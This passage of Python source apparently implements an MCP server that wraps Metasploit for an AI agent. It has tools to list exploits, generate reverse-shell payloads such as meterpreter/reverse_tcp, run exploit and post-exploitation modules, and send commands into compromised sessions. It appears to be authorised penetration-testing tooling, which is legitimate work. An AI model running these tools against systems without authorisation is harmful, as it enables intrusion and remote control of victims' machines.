670 | if any(err in setup_output for err in ["[-] Error setting", "Invalid option", "Unknown module", "Failed to load"]):
671 | error_msg = f"Error during setup command '{cmd}': {setup_output}"
672 | logger.error(error_msg)
673 | return {"status": "error", "message": error_msg, "module": full_module_path}
674 | await asyncio.sleep(0.1) # Small delay between setup commands
675 |
676 | # Execute the final command (exploit, run, check)
677 | logger.info(f"Running final console command: {command}")
678 | module_output = await run_command_safely(console, command, execution_timeout=timeout)
679 | logger.debug(f"Synchronous execution output length: {len(module_output)}")
680 |
681 | # --- Parse Console Output ---
682 | session_id = None
683 | session_opened_line = ""
684 | # More robust session detection pattern
685 | session_match = re.search(r"(?:meterpreter|command shell)\s+session\s+(\d+)\s+opened", module_output, re.IGNORECASE)
686 | if session_match:
687 | try:
688 | session_id = int(session_match.group(1))
689 | session_opened_line = session_match.group(0) # The matched line segment
690 | logger.info(f"Detected session {session_id} opened in console output.")
691 | except (ValueError, IndexError):
692 | logger.warning("Found session opened pattern, but failed to parse ID.")
693 |
694 | status = "success"
695 | message = f"{module_type.capitalize()} module {full_module_path} completed via console ({command})."
696 | if command in ['exploit', 'run'] and session_id is None and \
697 | any(term in module_output.lower() for term in ['session opened', 'sending stage']):
698 | message += " Session may have opened but ID detection failed or session closed quickly."
699 | status = "warning"
700 | elif command in ['exploit', 'run'] and session_id is not None:
701 | message += f" Session {session_id} detected."
702 |
703 | # Check for common failure indicators
704 | if any(fail in module_output.lower() for fail in ['exploit completed, but no session was created', 'exploit failed', 'run failed', 'check failed', 'module check failed']):
705 | status = "error" if status != "warning" else status # Don't override warning if session might have opened
706 | message = f"{module_type.capitalize()} module {full_module_path} execution via console appears to have failed. Check output."
707 | logger.error(f"Failure detected in console output for {full_module_path}.")
708 |
709 |
710 | return {
711 | "status": status,
712 | "message": message,
713 | "module_output": module_output,
714 | "session_id_detected": session_id,
715 | "session_opened_line": session_opened_line,
716 | "module": full_module_path,
717 | "options": module_options,
718 | "payload_name": payload_name_for_log,
719 | "payload_options": payload_options_for_log
720 | }
721 |
722 | except (RuntimeError, MsfRpcError, ValueError) as e: # Catch errors from run_command_safely or setup
723 | logger.error(f"Error during console execution of {full_module_path}: {e}")
724 | return {"status": "error", "message": f"Error executing {full_module_path} via console: {e}"}
725 | except Exception as e:
726 | logger.exception(f"Unexpected error during console execution of {full_module_path}")
727 | return {"status": "error", "message": f"Unexpected server error running {full_module_path} via console: {e}"}
728 |
729 | # --- MCP Tool Definitions ---
730 |
731 | @mcp.tool()
732 | async def list_exploits(search_term: str = "") -> List[str]:
733 | """
734 | List available Metasploit exploits, optionally filtered by search term.
735 |
736 | Args:
737 | search_term: Optional term to filter exploits (case-insensitive).
738 |
739 | Returns:
740 | List of exploit names matching the term (max 200), or the first 100 if no term is given.
741 | """
742 | client = get_msf_client()
743 | logger.info(f"Listing exploits (search term: '{search_term or 'None'}')")
744 | try:
745 | # Add timeout to prevent hanging on slow/unresponsive MSF server
746 | logger.debug(f"Calling client.modules.exploits with {RPC_CALL_TIMEOUT}s timeout...")
747 | exploits = await asyncio.wait_for(
748 | asyncio.to_thread(lambda: client.modules.exploits),
749 | timeout=RPC_CALL_TIMEOUT
750 | )
751 | logger.debug(f"Retrieved {len(exploits)} total exploits from MSF.")
752 | if search_term:
753 | term_lower = search_term.lower()
754 | filtered_exploits = [e for e in exploits if term_lower in e.lower()]
755 | count = len(filtered_exploits)
756 | limit = 200
757 | logger.info(f"Found {count} exploits matching '{search_term}'. Returning max {limit}.")
758 | return filtered_exploits[:limit]
759 | else:
760 | limit = 100
761 | logger.info(f"No search term provided, returning first {limit} exploits.")
762 | return exploits[:limit]
763 | except asyncio.TimeoutError:
764 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing exploits from Metasploit server. Server may be slow or unresponsive."
765 | logger.error(error_msg)
766 | return [f"Error: {error_msg}"]
767 | except MsfRpcError as e:
768 | logger.error(f"Metasploit RPC error while listing exploits: {e}")
769 | return [f"Error: Metasploit RPC error: {e}"]
770 | except Exception as e:
771 | logger.exception("Unexpected error listing exploits.")
772 | return [f"Error: Unexpected error listing exploits: {e}"]
773 |
774 | @mcp.tool()
775 | async def list_payloads(platform: str = "", arch: str = "") -> List[str]:
776 | """
777 | List available Metasploit payloads, optionally filtered by platform and/or architecture.
778 |
779 | Args:
780 | platform: Optional platform filter (e.g., 'windows', 'linux', 'python', 'php').
781 | arch: Optional architecture filter (e.g., 'x86', 'x64', 'cmd', 'meterpreter').
782 |
783 | Returns:
784 | List of payload names matching filters (max 100).
785 | """
786 | client = get_msf_client()
787 | logger.info(f"Listing payloads (platform: '{platform or 'Any'}', arch: '{arch or 'Any'}')")
788 | try:
789 | # Add timeout to prevent hanging on slow/unresponsive MSF server
790 | logger.debug(f"Calling client.modules.payloads with {RPC_CALL_TIMEOUT}s timeout...")
791 | payloads = await asyncio.wait_for(
792 | asyncio.to_thread(lambda: client.modules.payloads),
793 | timeout=RPC_CALL_TIMEOUT
794 | )
795 | logger.debug(f"Retrieved {len(payloads)} total payloads from MSF.")
796 | filtered = payloads
797 | if platform:
798 | plat_lower = platform.lower()
799 | # Match platform at the start of the payload path segment or within common paths
800 | filtered = [p for p in filtered if p.lower().startswith(plat_lower + '/') or f"/{plat_lower}/" in p.lower()]
801 | if arch:
802 | arch_lower = arch.lower()
803 | # Match architecture more flexibly (e.g., '/x64/', 'meterpreter')
804 | filtered = [p for p in filtered if f"/{arch_lower}/" in p.lower() or arch_lower in p.lower().split('/')]
805 |
806 | count = len(filtered)
807 | limit = 100
808 | logger.info(f"Found {count} payloads matching filters. Returning max {limit}.")
809 | return filtered[:limit]
810 | except asyncio.TimeoutError:
811 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing payloads from Metasploit server. Server may be slow or unresponsive."
812 | logger.error(error_msg)
813 | return [f"Error: {error_msg}"]
814 | except MsfRpcError as e:
815 | logger.error(f"Metasploit RPC error while listing payloads: {e}")
816 | return [f"Error: Metasploit RPC error: {e}"]
817 | except Exception as e:
818 | logger.exception("Unexpected error listing payloads.")
819 | return [f"Error: Unexpected error listing payloads: {e}"]
820 |
821 | @mcp.tool()
822 | async def generate_payload(
823 | payload_type: str,
824 | format_type: str,
825 | options: Union[Dict[str, Any], str], # Required: e.g., {"LHOST": "1.2.3.4", "LPORT": 4444} or "LHOST=1.2.3.4,LPORT=4444"
826 | encoder: Optional[str] = None,
827 | iterations: int = 0,
828 | bad_chars: str = "",
829 | nop_sled_size: int = 0,
830 | template_path: Optional[str] = None,
831 | keep_template: bool = False,
832 | force_encode: bool = False,
833 | output_filename: Optional[str] = None,
834 | ) -> Dict[str, Any]:
835 | """
836 | Generate a Metasploit payload using the RPC API (payload.generate).
837 | Saves the generated payload to a file on the server if successful.
838 |
839 | Args:
840 | payload_type: Type of payload (e.g., windows/meterpreter/reverse_tcp).
841 | format_type: Output format (raw, exe, python, etc.).
842 | options: Dictionary of required payload options (e.g., {"LHOST": "1.2.3.4", "LPORT": 4444})
843 | or string format "LHOST=1.2.3.4,LPORT=4444". Prefer dict format.
844 | encoder: Optional encoder to use.
845 | iterations: Optional number of encoding iterations.
846 | bad_chars: Optional string of bad characters to avoid (e.g., '\\x00\\x0a\\x0d').
847 | nop_sled_size: Optional size of NOP sled.
848 | template_path: Optional path to an executable template.
849 | keep_template: Keep the template working (requires template_path).
850 | force_encode: Force encoding even if not needed by bad chars.
851 | output_filename: Optional desired filename (without path). If None, a default name is generated.
852 |
853 | Returns:
854 | Dictionary containing status, message, payload size/info, and server-side save path.
855 | """
856 | client = get_msf_client()
857 | logger.info(f"Generating payload '{payload_type}' (Format: {format_type}) via RPC. Options: {options}")
858 |
859 | # Parse options gracefully
860 | try:
861 | parsed_options = _parse_options_gracefully(options)
862 | except ValueError as e:
863 | return {"status": "error", "message": f"Invalid options format: {e}"}
864 |
865 | if not parsed_options:
866 | return {"status": "error", "message": "Payload 'options' dictionary (e.g., LHOST, LPORT) is required."}
867 |
868 | try:
869 | # Get the payload module object
870 | payload = await _get_module_object('payload', payload_type)
871 |
872 | # Set payload-specific required options (like LHOST/LPORT)
873 | await _set_module_options(payload, parsed_options)
874 |
875 | # Set payload generation options in payload.runoptions
876 | # as per the pymetasploit3 documentation
877 | logger.info("Setting payload generation options in payload.runoptions...")
878 |
879 | # Define a function to update an individual runoption
880 | async def update_runoption(key, value):
881 | if value is None:
882 | return
883 | await asyncio.to_thread(lambda k=key, v=value: payload.runoptions.__setitem__(k, v))
884 | logger.debug(f"Set runoption {key}={value}")
885 |
886 | # Set generation options individually
887 | await update_runoption('Format', format_type)
888 | if encoder:
889 | await update_runoption('Encoder', encoder)
890 | if iterations:
891 | await update_runoption('Iterations', iterations)
892 | if bad_chars: # Skip the empty-string default, consistent with the other optional settings
893 | await update_runoption('BadChars', bad_chars)
894 | if nop_sled_size:
895 | await update_runoption('NopSledSize', nop_sled_size)
896 | if template_path:
897 | await update_runoption('Template', template_path)
898 | if keep_template:
899 | await update_runoption('KeepTemplateWorking', keep_template)
900 | if force_encode:
901 | await update_runoption('ForceEncode', force_encode)
902 |
903 | # Generate the payload bytes using payload.payload_generate()
904 | logger.info("Calling payload.payload_generate()...")
905 | raw_payload_bytes = await asyncio.to_thread(lambda: payload.payload_generate())
906 |
907 | if not isinstance(raw_payload_bytes, bytes):
908 | error_msg = f"Expected bytes, got {type(raw_payload_bytes)}: {str(raw_payload_bytes)[:200]}"
909 | logger.error(f"Payload generation failed. {error_msg}")
910 | # Try to extract specific error from potential dictionary response
911 | if isinstance(raw_payload_bytes, dict) and raw_payload_bytes.get('error'):
912 | error_msg = raw_payload_bytes.get('error_message', str(raw_payload_bytes))
913 | return {"status": "error", "message": f"Payload generation failed: {error_msg}"}
914 |
915 | payload_size = len(raw_payload_bytes)
916 | logger.info(f"Payload generation successful. Size: {payload_size} bytes.")
917 |
918 | # --- Save Payload ---
919 | # Ensure directory exists
920 | try:
921 | os.makedirs(PAYLOAD_SAVE_DIR, exist_ok=True)
922 | logger.debug(f"Ensured payload directory exists: {PAYLOAD_SAVE_DIR}")
923 | except OSError as e:
924 | logger.error(f"Failed to create payload save directory {PAYLOAD_SAVE_DIR}: {e}")
925 | return {
926 | "status": "error",
927 | "message": f"Payload generated ({payload_size} bytes) but could not create save directory: {e}",
928 | "payload_size": payload_size, "format": format_type
929 | }
930 |
931 | # Determine filename (with basic sanitization)
932 | final_filename = None
933 | if output_filename:
934 | sanitized = re.sub(r'[^a-zA-Z0-9_.\-]', '_', os.path.basename(output_filename)) # Basic sanitize + basename
935 | if sanitized.strip('.'): final_filename = sanitized # Reject names made only of dots (e.g. '..')
936 |
937 | if not final_filename:
938 | timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
939 | safe_payload_type = re.sub(r'[^a-zA-Z0-9_]', '_', payload_type)
940 | safe_format = re.sub(r'[^a-zA-Z0-9_]', '_', format_type)
941 | final_filename = f"payload_{safe_payload_type}_{timestamp}.{safe_format}"
942 |
943 | save_path = os.path.join(PAYLOAD_SAVE_DIR, final_filename)
944 |
945 | # Write payload to file
946 | try:
947 | with open(save_path, "wb") as f:
948 | f.write(raw_payload_bytes)
949 | logger.info(f"Payload saved to {save_path}")
950 | return {
951 | "status": "success",
952 | "message": f"Payload '{payload_type}' generated successfully and saved.",
953 | "payload_size": payload_size,
954 | "format": format_type,
955 | "server_save_path": save_path
956 | }
957 | except IOError as e:
958 | logger.error(f"Failed to write payload to {save_path}: {e}")
959 | return {
960 | "status": "error",
961 | "message": f"Payload generated but failed to save to file: {e}",
962 | "payload_size": payload_size, "format": format_type
963 | }
964 |
965 | except (ValueError, MsfRpcError) as e: # Catches errors from _get_module_object, _set_module_options
966 | error_str = str(e).lower()
967 | logger.error(f"Error generating payload {payload_type}: {e}")
968 | if "invalid payload type" in error_str or "unknown module" in error_str:
969 | return {"status": "error", "message": f"Invalid payload type: {payload_type}"}
970 | elif "missing required option" in error_str or "invalid option" in error_str:
971 | missing = getattr(payload, 'missing_required', []) if 'payload' in locals() else []
972 | return {"status": "error", "message": f"Missing/invalid options for payload {payload_type}: {e}", "missing_required": missing}
973 | return {"status": "error", "message": f"Error generating payload: {e}"}
974 | except AttributeError as e: # Specifically catch if payload_generate is missing
975 | logger.exception(f"AttributeError during payload generation for '{payload_type}': {e}")
976 | if "object has no attribute 'payload_generate'" in str(e):
977 | return {"status": "error", "message": "The pymetasploit3 payload module doesn't have the payload_generate method. Please check library version/compatibility."}
978 | return {"status": "error", "message": f"An attribute error occurred: {e}"}
979 | except Exception as e:
980 | logger.exception(f"Unexpected error during payload generation for '{payload_type}'.")
981 | return {"status": "error", "message": f"An unexpected server error occurred during payload generation: {e}"}
982 |
983 | @mcp.tool()
984 | async def run_exploit(
985 | module_name: str,
986 | options: Dict[str, Any],
987 | payload_name: Optional[str] = None,
988 | payload_options: Optional[Union[Dict[str, Any], str]] = None,
989 | run_as_job: bool = False,
990 | check_vulnerability: bool = False, # New option
991 | timeout_seconds: int = LONG_CONSOLE_READ_TIMEOUT # Used only if run_as_job=False
992 | ) -> Dict[str, Any]:
993 | """
994 | Run a Metasploit exploit module with specified options. Handles async (job)
995 | and sync (console) execution, and includes session polling for jobs.
996 |
997 | Args:
998 | module_name: Name/path of the exploit module (e.g., 'unix/ftp/vsftpd_234_backdoor').
999 | options: Dictionary of exploit module options (e.g., {'RHOSTS': '192.168.1.1'}).
1000 | payload_name: Name of the payload (e.g., 'linux/x86/meterpreter/reverse_tcp').
1001 | payload_options: Dictionary of payload options (e.g., {'LHOST': '...', 'LPORT': ...})
1002 | or string format "LHOST=1.2.3.4,LPORT=4444". Prefer dict format.
1003 | run_as_job: If False (default), run sync via console. If True, run async via RPC.
1004 | check_vulnerability: If True, run module's 'check' action first (if available).
1005 | timeout_seconds: Max time for synchronous run via console.
1006 |
1007 | Returns:
1008 | Dictionary with execution results (job_id, session_id, output) or error details.
1009 | """
1010 | logger.info(f"Request to run exploit '{module_name}'. Job: {run_as_job}, Check: {check_vulnerability}, Payload: {payload_name}")
1011 |
1012 | # Parse payload options gracefully
1013 | try:
1014 | parsed_payload_options = _parse_options_gracefully(payload_options)
1015 | except ValueError as e:
1016 | return {"status": "error", "message": f"Invalid payload_options format: {e}"}
1017 |
1018 | payload_spec = None
1019 | if payload_name:
1020 | payload_spec = {"name": payload_name, "options": parsed_payload_options}
1021 |
1022 | if check_vulnerability:
1023 | logger.info(f"Performing vulnerability check first for {module_name}...")
1024 | try:
1025 | # Use the console helper for 'check' as it provides output
1026 | check_result = await _execute_module_console(
1027 | module_type='exploit',
1028 | module_name=module_name,
1029 | module_options=options,
1030 | command='check', # Use the 'check' command
1031 | timeout=timeout_seconds
1032 | )
1033 | logger.info(f"Vulnerability check result: {check_result.get('status')} - {check_result.get('message')}")
1034 | output = check_result.get("module_output", "").lower()
1035 | # Check output for positive indicators
1036 | is_vulnerable = "appears vulnerable" in output or "is vulnerable" in output or "+ vulnerable" in output
1037 | # Check for negative indicators (more reliable sometimes)
1038 | is_not_vulnerable = "does not appear vulnerable" in output or "is not vulnerable" in output or "target is not vulnerable" in output or "check failed" in output
1039 | if check_result.get('status') == "error":
1040 | logger.warning(f"Error from metasploit: {check_result}")
1041 | return {"status": "aborted", "message": f"Check indicates a failure: {check_result.get('message')}", "check_output": check_result.get("module_output")}
1042 |
1043 | if is_not_vulnerable or (not is_vulnerable and check_result.get("status") == "error"):
1044 | logger.warning(f"Check indicates target is likely not vulnerable to {module_name}.")
1045 | return {"status": "aborted", "message": f"Check indicates target not vulnerable. Exploit not attempted.", "check_output": check_result.get("module_output")}
1046 | elif not is_vulnerable:
1047 | logger.warning(f"Check result inconclusive for {module_name}. Proceeding with exploit attempt cautiously.")
1048 | else:
1049 | logger.info(f"Check indicates target appears vulnerable to {module_name}. Proceeding.")
1050 | # Optionally return check output here if needed by the agent
1051 |
1052 | except Exception as chk_e:
1053 | logger.warning(f"Vulnerability check failed for {module_name}: {chk_e}. Proceeding with exploit attempt.")
1054 | # Fall through to exploit attempt
1055 |
1056 | # Execute the exploit
1057 | if run_as_job:
1058 | return await _execute_module_rpc(
1059 | module_type='exploit',
1060 | module_name=module_name,
1061 | module_options=options,
1062 | payload_spec=payload_spec
1063 | )
1064 | else:
1065 | return await _execute_module_console(
1066 | module_type='exploit',
1067 | module_name=module_name,
1068 | module_options=options,
1069 | command='exploit',
1070 | payload_spec=payload_spec,
1071 | timeout=timeout_seconds
1072 | )
1073 |
1074 | @mcp.tool()
1075 | async def run_post_module(
1076 | module_name: str,
1077 | session_id: int,
1078 | options: Optional[Dict[str, Any]] = None,
1079 | run_as_job: bool = False,
1080 | timeout_seconds: int = LONG_CONSOLE_READ_TIMEOUT
1081 | ) -> Dict[str, Any]:
1082 | """
1083 | Run a Metasploit post-exploitation module against a session.
1084 |
1085 | Args:
1086 | module_name: Name/path of the post module (e.g., 'windows/gather/enum_shares').
1087 | session_id: The ID of the target session.
1088 | options: Dictionary of module options. 'SESSION' will be added automatically.
1089 | run_as_job: If False (default), run sync via console. If True, run async via RPC.
1090 | timeout_seconds: Max time for synchronous run via console.
1091 |
1092 | Returns:
1093 | Dictionary with execution results or error details.
1094 | """
1095 | logger.info(f"Request to run post module {module_name} on session {session_id}. Job: {run_as_job}")
1096 | module_options = dict(options or {}) # Copy so the caller's dict is not mutated below
1097 | module_options['SESSION'] = session_id # Ensure SESSION is always set
1098 |
1099 | # Add basic session validation before running
1100 | client = get_msf_client()
1101 | try:
1102 | current_sessions = await asyncio.to_thread(lambda: client.sessions.list)
1103 | if str(session_id) not in current_sessions:
1104 | logger.error(f"Session {session_id} not found for post module {module_name}.")
1105 | return {"status": "error", "message": f"Session {session_id} not found.", "module": module_name}
1106 | except MsfRpcError as e:
1107 | logger.error(f"Failed to validate session {session_id} before running post module: {e}")
1108 | # Optionally proceed with caution or return error
1109 | return {"status": "error", "message": f"Error validating session {session_id}: {e}", "module": module_name}
1110 |
1111 |
1112 | if run_as_job:
1113 | return await _execute_module_rpc(
1114 | module_type='post',
1115 | module_name=module_name,
1116 | module_options=module_options
1117 | # No payload for post modules
1118 | )
1119 | else:
1120 | return await _execute_module_console(
1121 | module_type='post',
1122 | module_name=module_name,
1123 | module_options=module_options,
1124 | command='run',
1125 | timeout=timeout_seconds
1126 | )
1127 |
1128 | @mcp.tool()
1129 | async def run_auxiliary_module(
1130 | module_name: str,
1131 | options: Dict[str, Any],
1132 | run_as_job: bool = False, # Default False for scanners often makes sense
1133 | check_target: bool = False, # Add check option similar to exploit
1134 | timeout_seconds: int = LONG_CONSOLE_READ_TIMEOUT
1135 | ) -> Dict[str, Any]:
1136 | """
1137 | Run a Metasploit auxiliary module.
1138 |
1139 | Args:
1140 | module_name: Name/path of the auxiliary module (e.g., 'scanner/ssh/ssh_login').
1141 | options: Dictionary of module options (e.g., {'RHOSTS': ..., 'USERNAME': ...}).
1142 | run_as_job: If False (default), run sync via console. If True, run async via RPC.
1143 | check_target: If True, run module's 'check' action first (if available).
1144 | timeout_seconds: Max time for synchronous run via console.
1145 |
1146 | Returns:
1147 | Dictionary with execution results or error details.
1148 | """
1149 | logger.info(f"Request to run auxiliary module {module_name}. Job: {run_as_job}, Check: {check_target}")
1150 | module_options = options or {}
1151 |
1152 | if check_target:
1153 | logger.info(f"Performing check first for auxiliary module {module_name}...")
1154 | try:
1155 | # Use the console helper for 'check'
1156 | check_result = await _execute_module_console(
1157 | module_type='auxiliary',
1158 | module_name=module_name,
1159 | module_options=module_options,
1160 | command='check',
1161 | timeout=timeout_seconds
1162 | )
1163 | logger.info(f"Auxiliary check result: {check_result.get('status')} - {check_result.get('message')}")
1164 | output = check_result.get("module_output", "").lower()
1165 | # Generic check for positive outcome (aux check output varies widely)
1166 | is_positive = "host is likely vulnerable" in output or "target appears reachable" in output or "+ check" in output
1167 | is_negative = "host is not vulnerable" in output or "target is not reachable" in output or "check failed" in output
1168 |
1169 | if is_negative or (not is_positive and check_result.get("status") == "error"):
1170 | logger.warning(f"Check indicates target may not be suitable for {module_name}.")
1171 | return {"status": "aborted", "message": f"Check indicates target unsuitable. Module not run.", "check_output": check_result.get("module_output")}
1172 | elif not is_positive:
1173 | logger.warning(f"Check result inconclusive for {module_name}. Proceeding with run.")
1174 | else:
1175 | logger.info(f"Check appears positive for {module_name}. Proceeding.")
1176 |
1177 | except Exception as chk_e:
1178 | logger.warning(f"Check failed for auxiliary {module_name}: {chk_e}. Proceeding with run attempt.")
1179 |
1180 | if run_as_job:
1181 | return await _execute_module_rpc(
1182 | module_type='auxiliary',
1183 | module_name=module_name,
1184 | module_options=module_options
1185 | # No payload for aux modules
1186 | )
1187 | else:
1188 | return await _execute_module_console(
1189 | module_type='auxiliary',
1190 | module_name=module_name,
1191 | module_options=module_options,
1192 | command='run',
1193 | timeout=timeout_seconds
1194 | )
1195 |
1196 | @mcp.tool()
1197 | async def list_active_sessions() -> Dict[str, Any]:
1198 | """List active Metasploit sessions with their details."""
1199 | client = get_msf_client()
1200 | logger.info("Listing active Metasploit sessions.")
1201 | try:
1202 | logger.debug(f"Calling client.sessions.list with {RPC_CALL_TIMEOUT}s timeout...")
1203 | sessions_dict = await asyncio.wait_for(
1204 | asyncio.to_thread(lambda: client.sessions.list),
1205 | timeout=RPC_CALL_TIMEOUT
1206 | )
1207 | if not isinstance(sessions_dict, dict):
1208 | logger.error(f"Expected dict from sessions.list, got {type(sessions_dict)}")
1209 | return {"status": "error", "message": f"Unexpected data type for sessions list: {type(sessions_dict)}"}
1210 |
1211 | logger.info(f"Found {len(sessions_dict)} active sessions.")
1212 | # Ensure keys are strings for consistent JSON
1213 | sessions_dict_str_keys = {str(k): v for k, v in sessions_dict.items()}
1214 | return {"status": "success", "sessions": sessions_dict_str_keys, "count": len(sessions_dict_str_keys)}
1215 | except asyncio.TimeoutError:
1216 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing sessions from Metasploit server. Server may be slow or unresponsive."
1217 | logger.error(error_msg)
1218 | return {"status": "error", "message": error_msg}
1219 | except MsfRpcError as e:
1220 | logger.error(f"Metasploit RPC error while listing sessions: {e}")
1221 | return {"status": "error", "message": f"Metasploit RPC error: {e}"}
1222 | except Exception as e:
1223 | logger.exception("Unexpected error listing sessions.")
1224 | return {"status": "error", "message": f"Unexpected error listing sessions: {e}"}
1225 |
1226 | @mcp.tool()
1227 | async def send_session_command(
1228 | session_id: int,
1229 | command: str,
1230 | timeout_seconds: int = SESSION_COMMAND_TIMEOUT,
1231 | ) -> Dict[str, Any]:
1232 | """
1233 | Send a command to an active Metasploit session (Meterpreter or Shell) and get output.
1234 | Uses session.run_with_output for Meterpreter, and a prompt-aware loop for shells.
1235 | The agent is responsible for parsing the raw output.
1236 |
1237 | In Meterpreter mode, to run a shell command, run `shell` to enter the shell mode first.
1238 | To exit shell mode and return to Meterpreter, run `exit`.
1239 |
1240 | Args:
1241 | session_id: ID of the target session.
1242 | command: Command string to execute in the session.
1243 | timeout_seconds: Maximum time to wait for the command to complete.
1244 |
1245 | Returns:
1246 | Dictionary with status ('success', 'error', 'timeout') and raw command output.
1247 | """
1248 | client = get_msf_client()
1249 | logger.info(f"Sending command to session {session_id}: '{command}'")
1250 | session_id_str = str(session_id)
1251 |
1252 | try:
1253 | # --- Get Session Info and Object ---
1254 | current_sessions = await asyncio.to_thread(lambda: client.sessions.list)
1255 | if session_id_str not in current_sessions:
1256 | logger.error(f"Session {session_id} not found.")
1257 | return {"status": "error", "message": f"Session {session_id} not found."}
1258 |
1259 | session_info = current_sessions[session_id_str]
1260 | session_type = session_info.get('type', 'unknown').lower() if isinstance(session_info, dict) else 'unknown'
1261 | logger.debug(f"Session {session_id} type: {session_type}")
1262 |
1263 | session = await asyncio.to_thread(lambda: client.sessions.session(session_id_str))
1264 | if not session:
1265 | logger.error(f"Failed to get session object for existing session {session_id}.")
1266 | return {"status": "error", "message": f"Error retrieving session {session_id} object."}
1267 |
1268 | # --- Execute Command Based on Type ---
1269 | output = ""
1270 | status = "error" # Default status
1271 | message = "Command execution failed or type unknown."
1272 |
1273 | if session_type == 'meterpreter':
1274 | if session_shell_type.get(session_id_str) is None:
1275 | session_shell_type[session_id_str] = 'meterpreter'
1276 |
1277 | logger.debug(f"Using session.run_with_output for Meterpreter session {session_id}")
1278 | try:
1279 | # Use asyncio.wait_for to handle timeout manually since run_with_output doesn't support timeout parameter
1280 | if command == "shell":
1281 | if session_shell_type[session_id_str] == 'meterpreter':
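1282 | output = await asyncio.wait_for(asyncio.to_thread(lambda: session.run_with_output(command, end_strs=['created.'])), timeout=timeout_seconds)
1283 | session_shell_type[session_id_str] = 'shell'
1284 | await asyncio.to_thread(session.read) # Clear buffer without blocking the event loop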
1285 | else:
1286 | output = "You are already in shell mode."
1287 | elif command == "exit":
1288 | if session_shell_type[session_id_str] == 'meterpreter':
1289 | output = "You are already in meterpreter mode. No need to exit."
1290 | else:
1291 | await asyncio.to_thread(session.read) # Clear buffer without blocking the event loop
1292 | await asyncio.to_thread(session.detach)
1293 | session_shell_type[session_id_str] = 'meterpreter'
1294 | else:
1295 | output = await asyncio.wait_for(
1296 | asyncio.to_thread(lambda: session.run_with_output(command)),
1297 | timeout=timeout_seconds
1298 | )
1299 | status = "success"
1300 | message = "Meterpreter command executed successfully."
1301 | logger.debug(f"Meterpreter command '{command}' completed.")
1302 | except asyncio.TimeoutError:
1303 | status = "timeout"
1304 | message = f"Meterpreter command timed out after {timeout_seconds} seconds."
1305 | logger.warning(f"Command '{command}' timed out on Meterpreter session {session_id}")
1306 | # Try a final read for potentially partial output
1307 | try:
1308 | output = await asyncio.to_thread(lambda: session.read()) or ""
1309 | except Exception: pass # Best effort; a bare except would also swallow task cancellation
1310 | except (MsfRpcError, Exception) as run_err:
1311 | logger.error(f"Error during Meterpreter run_with_output for command '{command}': {run_err}")
1312 | message = f"Error executing Meterpreter command: {run_err}"
1313 | # Try a final read
1314 | try:
1315 | output = await asyncio.to_thread(lambda: session.read()) or ""
1316 | except Exception: pass # Best effort; a bare except would also swallow task cancellation
1317 |
1318 | elif session_type == 'shell':
1319 | logger.debug(f"Using manual read loop for Shell session {session_id}")
1320 | try:
1321 | await asyncio.to_thread(lambda: session.write(command + "\n"))
1322 |
1323 | # If the command is exit, don't wait for output/prompt, assume it worked
1324 | if command.strip().lower() == 'exit':
1325 | logger.info(f"Sent 'exit' to shell session {session_id}, assuming success without reading output.")
1326 | status = "success"
1327 | message = "Exit command sent to shell session."
1328 | output = "(No output expected after exit)"
1329 | # Skip the read loop for exit command
1330 | return {"status": status, "message": message, "output": output}
1331 |
1332 | # Proceed with read loop for non-exit commands
1333 | output_buffer = ""
1334 | start_time = asyncio.get_running_loop().time()
1335 | last_data_time = start_time
1336 | read_interval = 0.1
1337 |
1338 | while True:
1339 | now = asyncio.get_running_loop().time()
1340 | if (now - start_time) > timeout_seconds:
1341 | status = "timeout"
1342 | message = f"Shell command timed out after {timeout_seconds} seconds."
1343 | logger.warning(f"Command '{command}' timed out on Shell session {session_id}")
1344 | break
1345 |
1346 | chunk = await asyncio.to_thread(lambda: session.read())
1347 | if chunk:
1348 | output_buffer += chunk
1349 | last_data_time = now
1350 | # Check if the prompt appears at the end of the current buffer
1351 | if SHELL_PROMPT_RE.search(output_buffer):
1352 | logger.debug(f"Detected shell prompt for command '{command}'.")
1353 | status = "success"
1354 | message = "Shell command executed successfully."
1355 | break
1356 | elif (now - last_data_time) > SESSION_READ_INACTIVITY_TIMEOUT:
1357 | logger.debug(f"Shell inactivity timeout ({SESSION_READ_INACTIVITY_TIMEOUT}s) reached for command '{command}'. Assuming complete.")
1358 | status = "success" # Assume success if inactive after sending command
1359 | message = "Shell command likely completed (inactivity)."
1360 | break
1361 |
1362 | await asyncio.sleep(read_interval)
1363 | output = output_buffer # Assign final buffer to output
1364 | except (MsfRpcError, Exception) as run_err:
1365 | # Special handling for errors after sending 'exit'
1366 | if command.strip().lower() == 'exit':
1367 | logger.warning(f"Error occurred after sending 'exit' to shell {session_id}: {run_err}. This might be expected as session closes.")
1368 | status = "success" # Treat as success
1369 | message = f"Exit command sent, subsequent error likely due to session closing: {run_err}"
1370 | output = "(Error reading after exit, likely expected)"
1371 | else:
1372 | logger.error(f"Error during Shell write/read loop for command '{command}': {run_err}")
1373 | message = f"Error executing Shell command: {run_err}"
1374 | output = output_buffer # Return potentially partial output
1375 |
1376 | else: # Unknown session type
1377 | logger.warning(f"Cannot execute command: Unknown session type '{session_type}' for session {session_id}")
1378 | message = f"Cannot execute command: Unknown session type '{session_type}'."
1379 |
1380 | return {"status": status, "message": message, "output": output}
1381 |
1382 | except MsfRpcError as e:
1383 | if "Session ID is not valid" in str(e):
1384 | logger.error(f"RPC Error: Session {session_id} is invalid: {e}")
1385 | return {"status": "error", "message": f"Session {session_id} is not valid."}
1386 | logger.error(f"MsfRpcError interacting with session {session_id}: {e}")
1387 | return {"status": "error", "message": f"Error interacting with session {session_id}: {e}"}
1388 | except KeyError: # May occur if session disappears between list and access
1389 | logger.error(f"Session {session_id} likely disappeared (KeyError).")
1390 | return {"status": "error", "message": f"Session {session_id} not found or disappeared."}
1391 | except Exception as e:
1392 | logger.exception(f"Unexpected error sending command to session {session_id}.")
1393 | return {"status": "error", "message": f"Unexpected server error sending command: {e}"}
1394 |
1395 |
1396 | # --- Job and Listener Management Tools ---
1397 |
1398 | @mcp.tool()
1399 | async def list_listeners() -> Dict[str, Any]:
1400 | """List all active Metasploit jobs, categorizing exploit/multi/handler jobs."""
1401 | client = get_msf_client()
1402 | logger.info("Listing active listeners/jobs")
1403 | try:
1404 | logger.debug(f"Calling client.jobs.list with {RPC_CALL_TIMEOUT}s timeout...")
1405 | jobs = await asyncio.wait_for(
